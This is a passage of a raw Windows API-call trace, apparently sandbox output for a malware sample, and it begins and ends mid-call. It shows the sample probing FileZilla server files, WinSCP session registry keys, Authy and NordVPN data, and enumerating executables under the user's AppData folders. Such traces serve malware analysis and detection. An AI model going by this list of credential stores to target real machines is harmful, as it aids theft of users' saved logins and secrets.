(hKey=0x5a4) returned 0x0 [0135.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd618 | out: hHeap=0x3f0000) returned 1 [0135.462] GetLocalTime (in: lpSystemTime=0x36ef70 | out: lpSystemTime=0x36ef70*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x6, wDay=0x13, wHour=0x9, wMinute=0xc, wSecond=0x2a, wMilliseconds=0x259)) [0135.462] SystemTimeToFileTime (in: lpSystemTime=0x36ef70, lpFileTime=0x36ef80 | out: lpFileTime=0x36ef80) returned 1 [0135.462] FileTimeToSystemTime (in: lpFileTime=0x36ef60, lpSystemTime=0x36ef48 | out: lpSystemTime=0x36ef48) returned 1 [0135.462] GetDesktopWindow () returned 0x10010 [0135.462] GetTickCount () returned 0x1153708 [0135.462] GetLastError () returned 0x3 [0135.462] SetLastError (dwErrCode=0x3) [0135.462] GetLastError () returned 0x3 [0135.463] SetLastError (dwErrCode=0x3) [0135.463] GetLastError () returned 0x3 [0135.463] SetLastError (dwErrCode=0x3) [0135.463] GetLastError () returned 0x3 [0135.463] SetLastError (dwErrCode=0x3) [0135.463] GetLastError () returned 0x3 [0135.463] SetLastError (dwErrCode=0x3) [0135.463] GetLastError () returned 0x3 [0135.463] SetLastError (dwErrCode=0x3) [0135.463] GetLastError () returned 0x3 [0135.463] SetLastError (dwErrCode=0x3) [0135.463] GetLastError () returned 0x3 [0135.463] SetLastError (dwErrCode=0x3) [0135.463] GetLastError () returned 0x3 [0135.463] SetLastError (dwErrCode=0x3) [0135.463] GetLastError () returned 0x3 [0135.463] SetLastError (dwErrCode=0x3) [0135.463] GetLastError () returned 0x3 [0135.463] SetLastError (dwErrCode=0x3) [0135.464] GetLastError () returned 0x3 [0135.464] SetLastError (dwErrCode=0x3) [0135.464] GetLastError () returned 0x3 [0135.464] SetLastError (dwErrCode=0x3) [0135.464] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9) returned 0x9126300 [0135.464] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x360) returned 0x9145620 [0135.464] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e2e0 [0135.464] GetLocalTime (in: lpSystemTime=0x36ef68 | out: lpSystemTime=0x36ef68*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x6, wDay=0x13, wHour=0x9, wMinute=0xc, wSecond=0x2a, wMilliseconds=0x259)) [0135.464] SystemTimeToFileTime (in: lpSystemTime=0x36ef68, lpFileTime=0x36ef78 | out: lpFileTime=0x36ef78) returned 1 [0135.464] FileTimeToSystemTime (in: lpFileTime=0x36ef58, lpSystemTime=0x36ef40 | out: lpSystemTime=0x36ef40) returned 1 [0135.464] GetDesktopWindow () returned 0x10010 [0135.464] GetTickCount () returned 0x1153708 [0135.464] GetLastError () returned 0x3 [0135.464] SetLastError (dwErrCode=0x3) [0135.464] GetLastError () returned 0x3 [0135.464] SetLastError (dwErrCode=0x3) [0135.464] GetLastError () returned 0x3 [0135.464] SetLastError (dwErrCode=0x3) [0135.464] GetLastError () returned 0x3 [0135.465] SetLastError (dwErrCode=0x3) [0135.465] GetLastError () returned 0x3 [0135.465] SetLastError (dwErrCode=0x3) [0135.465] GetLastError () returned 0x3 [0135.465] SetLastError (dwErrCode=0x3) [0135.465] GetLastError () returned 0x3 [0135.465] SetLastError (dwErrCode=0x3) [0135.465] GetLastError () returned 0x3 [0135.465] SetLastError (dwErrCode=0x3) [0135.465] GetLastError () returned 0x3 [0135.465] SetLastError (dwErrCode=0x3) [0135.465] GetLastError () returned 0x3 [0135.465] SetLastError (dwErrCode=0x3) [0135.465] GetLastError () returned 0x3 [0135.465] SetLastError (dwErrCode=0x3) [0135.465] GetLastError () returned 0x3 [0135.465] SetLastError (dwErrCode=0x3) [0135.465] GetLastError () returned 0x3 [0135.465] SetLastError (dwErrCode=0x3) [0135.465] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9) returned 0x9126330 [0135.465] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x360) returned 0x91283f0 [0135.465] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e2e0 | out: hHeap=0x3f0000) returned 1 [0135.465] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.465] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e2e0 [0135.466] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e2b8 [0135.466] GetEnvironmentVariableA (in: lpName="appdata", lpBuffer=0x36f078, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0135.466] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.466] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0135.466] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla\\recentservers.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\filezilla\\recentservers.xml")) returned 0xffffffff [0135.466] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0135.466] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla\\sitemanager.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\filezilla\\sitemanager.xml")) returned 0xffffffff [0135.466] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0135.466] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0135.466] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.466] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e2b8 | out: hHeap=0x3f0000) returned 1 [0135.466] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e2e0 | out: hHeap=0x3f0000) returned 1 [0135.466] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.466] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Martin Prikryl\\WinSCP 2\\Sessions", phkResult=0x36f4e0 | out: phkResult=0x36f4e0*=0x0) returned 0x2 [0135.466] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.466] GetEnvironmentVariableA (in: lpName="appdata", lpBuffer=0x36ef28, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0135.466] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.466] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0135.466] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.466] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.467] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Authy Desktop\\Local Storage\\*.localstorage", lpFindFileData=0x36f358 | out: lpFindFileData=0x36f358*(dwFileAttributes=0x4b, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x3, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4b, ftLastWriteTime.dwHighDateTime=0x499b90, nFileSizeHigh=0x3f0150, nFileSizeLow=0x7f0081fe, dwReserved0=0x3f0000, dwReserved1=0x3f0150, cFileName="ø¯¢\nXz?", cAlternateFileName=" ")) returned 0xffffffff [0135.467] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.467] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0135.467] GetEnvironmentVariableA (in: lpName="localappdata", lpBuffer=0x36eda0, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x2b [0135.467] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.467] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x47) returned 0x9150688 [0135.467] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.467] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x437310 [0135.467] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\NordVPN\\NordVPN*", lpFindFileData=0x36f1d0 | out: lpFindFileData=0x36f1d0*(dwFileAttributes=0x77e0801c, ftCreationTime.dwLowDateTime=0x36f4cc, ftCreationTime.dwHighDateTime=0x3f01ec, ftLastAccessTime.dwLowDateTime=0x3f0000, ftLastAccessTime.dwHighDateTime=0x8cd41f58, ftLastWriteTime.dwLowDateTime=0x6d0050, ftLastWriteTime.dwHighDateTime=0x17b0009, nFileSizeHigh=0xa310ccb4, nFileSizeLow=0x700041, dwReserved0=0x50, dwReserved1=0x740061, cFileName="", cAlternateFileName="\x1b(>\x01")) returned 0xffffffff [0135.467] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x437310 | out: hHeap=0x3f0000) returned 1 [0135.467] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9150688 | out: hHeap=0x3f0000) returned 1 [0135.467] GetEnvironmentVariableA (in: lpName="SystemDrive", lpBuffer=0x36f120, nSize=0x400 | out: lpBuffer="C:") returned 0x2 [0135.467] FindFirstFileA (in: lpFileName="C:\\Users\\*", lpFindFileData=0x36f318 | out: lpFindFileData=0x36f318*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x36f108, dwReserved1=0x76c1fe2a, cFileName=".", cAlternateFileName="")) returned 0x9148838 [0135.467] FindNextFileA (in: hFindFile=0x9148838, lpFindFileData=0x36f318 | out: lpFindFileData=0x36f318*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x36f108, dwReserved1=0x76c1fe2a, cFileName="..", cAlternateFileName="")) returned 1 [0135.468] FindNextFileA (in: hFindFile=0x9148838, lpFindFileData=0x36f318 | out: lpFindFileData=0x36f318*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x36f108, dwReserved1=0x76c1fe2a, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0135.468] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e2e0 [0135.468] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e2b8 [0135.468] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e3a8 [0135.468] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x36f0e0 | out: lpFindFileData=0x36f0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x91488f8 [0135.468] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e3a8 | out: hHeap=0x3f0000) returned 1 [0135.468] FindNextFileA (in: hFindFile=0x91488f8, lpFindFileData=0x36f0e0 | out: lpFindFileData=0x36f0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.468] FindNextFileA (in: hFindFile=0x91488f8, lpFindFileData=0x36f0e0 | out: lpFindFileData=0x36f0e0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0135.468] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e3a8 [0135.468] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.468] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e3a8 | out: hHeap=0x3f0000) returned 1 [0135.468] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0135.468] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x36eea8 | out: lpFindFileData=0x36eea8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148938 [0135.468] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0135.468] FindNextFileA (in: hFindFile=0x9148938, lpFindFileData=0x36eea8 | out: lpFindFileData=0x36eea8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.468] FindNextFileA (in: hFindFile=0x9148938, lpFindFileData=0x36eea8 | out: lpFindFileData=0x36eea8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe0434360, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe0434360, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="Local", cAlternateFileName="")) returned 1 [0135.468] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0135.469] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0135.469] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x36ec70 | out: lpFindFileData=0x36ec70*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe0434360, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe0434360, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148978 [0135.469] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0135.469] FindNextFileA (in: hFindFile=0x9148978, lpFindFileData=0x36ec70 | out: lpFindFileData=0x36ec70*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe0434360, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe0434360, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.469] FindNextFileA (in: hFindFile=0x9148978, lpFindFileData=0x36ec70 | out: lpFindFileData=0x36ec70*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdc30a920, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xdf175620, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xdf175620, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="40b348bf-da79-4308-8258-aae3cfc82a0b", cAlternateFileName="40B348~1")) returned 1 [0135.469] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0135.469] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174ec8 [0135.469] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.469] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174ec8 | out: hHeap=0x3f0000) returned 1 [0135.469] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd618 [0135.469] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\*", lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdc30a920, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xdf175620, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xdf175620, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x91489b8 [0135.469] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd618 | out: hHeap=0x3f0000) returned 1 [0135.469] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdc30a920, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xdf175620, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xdf175620, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.469] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdf175620, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xdf175620, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xdf6844e0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x84c00, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="5.exe", cAlternateFileName="")) returned 1 [0135.469] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd618 [0135.469] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xde6bf320, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xde6bf320, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xdea2b2c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x34200, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="updatewin.exe", cAlternateFileName="UPDATE~3.EXE")) returned 1 [0135.469] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd680 [0135.469] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd618 | out: hHeap=0x3f0000) returned 1 [0135.470] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdc88bc00, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xdc88bc00, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xdce33040, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x44200, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="updatewin1.exe", cAlternateFileName="UPDATE~1.EXE")) returned 1 [0135.470] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd618 [0135.470] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd680 | out: hHeap=0x3f0000) returned 1 [0135.470] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xde13e040, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xde13e040, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xde3eb900, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x44a00, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="updatewin2.exe", cAlternateFileName="UPDATE~2.EXE")) returned 1 [0135.470] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd680 [0135.470] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd618 | out: hHeap=0x3f0000) returned 1 [0135.470] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xde13e040, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xde13e040, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xde3eb900, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x44a00, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="updatewin2.exe", cAlternateFileName="UPDATE~2.EXE")) returned 0 [0135.470] FindClose (in: hFindFile=0x91489b8 | out: hFindFile=0x91489b8) returned 1 [0135.470] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd680 | out: hHeap=0x3f0000) returned 1 [0135.470] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.470] FindNextFileA (in: hFindFile=0x9148978, lpFindFileData=0x36ec70 | out: lpFindFileData=0x36ec70*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd98ca2a0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xd98f0400, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xd98f0400, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489b8, dwReserved1=0x13d180a, cFileName="a14790f6-2e96-4184-8635-958462b07e84", cAlternateFileName="A14790~1")) returned 1 [0135.470] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174ec8 [0135.470] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.470] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174ec8 | out: hHeap=0x3f0000) returned 1 [0135.470] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd680 [0135.470] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\*", lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd98ca2a0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xd98f0400, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xd98f0400, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x91489b8 [0135.470] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd680 | out: hHeap=0x3f0000) returned 1 [0135.470] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd98ca2a0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xd98f0400, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xd98f0400, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.471] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd98f0400, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xd98f0400, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xdda7b600, ftLastWriteTime.dwHighDateTime=0x1d6d589, nFileSizeHigh=0x0, nFileSizeLow=0xd1800, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="OqRoSnESYXcDITEx.exe", cAlternateFileName="OQROSN~1.EXE")) returned 1 [0135.471] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, 